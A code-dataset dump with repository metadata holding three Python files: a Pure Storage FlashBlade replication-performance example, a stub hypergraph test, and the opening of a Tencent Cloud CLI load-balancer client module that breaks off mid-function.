bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
# list instantaneous replication performance for all array connections
res = client.get_array_connections_performance_replication()
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# list instantaneous file-replication performance for all array connections
res = client.get_array_connections_performance_replication(type='file-system')
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# list instantaneous file-replication performance for array connection with id '10314f42-020d-7080-8013-000ddt400090'
res = client.get_array_connections_performance_replication(ids=['10314f42-020d-7080-8013-000ddt400090'],
type='file-system')
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# list historical object-replication performance for all array connections between some
# start time and end time
res = client.get_array_connections_performance_replication(
start_time=START_TIME,
end_time=END_TIME,
type='object-store',
resolution=30000)
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# list historical object-replication performance for array connection 'remote_array' between some
# start time and end time
res = client.get_array_connections_performance_replication(
start_time=START_TIME,
end_time=END_TIME,
resolution=30000,
type='object-store',
names=['remote_array'])
print(res)
if type(res) == pypureclient.responses.ValidResponse:
print(list(res.items))
# Other valid fields: continuation_token, filter, limit, offset, remote_ids, remote_names,
# sort, total_only
# See section "Common Fields" for examples
| 40.133333
| 117
| 0.754707
| 222
| 1,806
| 5.986486
| 0.256757
| 0.096313
| 0.094056
| 0.063958
| 0.82769
| 0.75696
| 0.742664
| 0.705041
| 0.705041
| 0.705041
| 0
| 0.041857
| 0.153378
| 1,806
| 44
| 118
| 41.045455
| 0.827338
| 0.36268
| 0
| 0.766667
| 0
| 0
| 0.082456
| 0.031579
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cedccd46fae43e720f9140d83a394a034a4505ee
| 162
|
py
|
Python
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-HyperG
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 48
|
2020-04-15T07:41:59.000Z
|
2022-03-26T06:08:12.000Z
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-HyperG
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 5
|
2021-02-07T23:44:07.000Z
|
2022-03-23T08:48:40.000Z
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-Moon
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 10
|
2020-05-22T03:46:11.000Z
|
2022-03-21T11:51:06.000Z
|
import numpy as np
from hyperg.hyperg import HyperG
from hyperg.learning.classification import cross_diffusion_infer
def test_cross_diffusion_infer():
pass
| 20.25
| 64
| 0.833333
| 23
| 162
| 5.652174
| 0.608696
| 0.153846
| 0.292308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 8
| 65
| 20.25
| 0.921986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0cba18b8e33ed2e0e8a6bb0fb8e1f891c18515b4
| 83,778
|
py
|
Python
|
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 1
|
2022-02-07T13:39:09.000Z
|
2022-02-07T13:39:09.000Z
|
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 4
|
2020-07-20T01:51:58.000Z
|
2021-08-13T08:25:22.000Z
|
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.clb.v20180317 import clb_client as clb_client_v20180317
from tencentcloud.clb.v20180317 import models as models_v20180317
def doRegisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RegisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.RegisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetLoadBalancerSecurityGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetLoadBalancerSecurityGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.SetLoadBalancerSecurityGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBListeners(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClassicalLBListenersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeClassicalLBListeners(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCustomizedConfigAssociateList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCustomizedConfigAssociateListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCustomizedConfigAssociateList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBlockIPTask(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBlockIPTaskRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeBlockIPTask(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancerSnatIps(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerSnatIpsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancerSnatIps(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetSecurityGroupForLoadbalancers(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetSecurityGroupForLoadbalancersRequest()
model.from_json_string(json.dumps(args))
rsp = client.SetSecurityGroupForLoadbalancers(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchDeregisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchDeregisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.BatchDeregisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRegisterTargetGroupInstances(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RegisterTargetGroupInstancesRequest()
model.from_json_string(json.dumps(args))
rsp = client.RegisterTargetGroupInstances(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAutoRewrite(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AutoRewriteRequest()
model.from_json_string(json.dumps(args))
rsp = client.AutoRewrite(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancerTraffic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancerTrafficRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancerTraffic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancerListeners(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerListenersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancerListeners(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTargetGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTargetGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteTargetGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargetsFromClassicalLB(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeregisterTargetsFromClassicalLBRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeregisterTargetsFromClassicalLB(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateLoadBalancer(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateLoadBalancerRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateLoadBalancer(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancerListByCertId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancerListByCertIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancerListByCertId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancer(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancer(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyDomainAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisassociateTargetGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
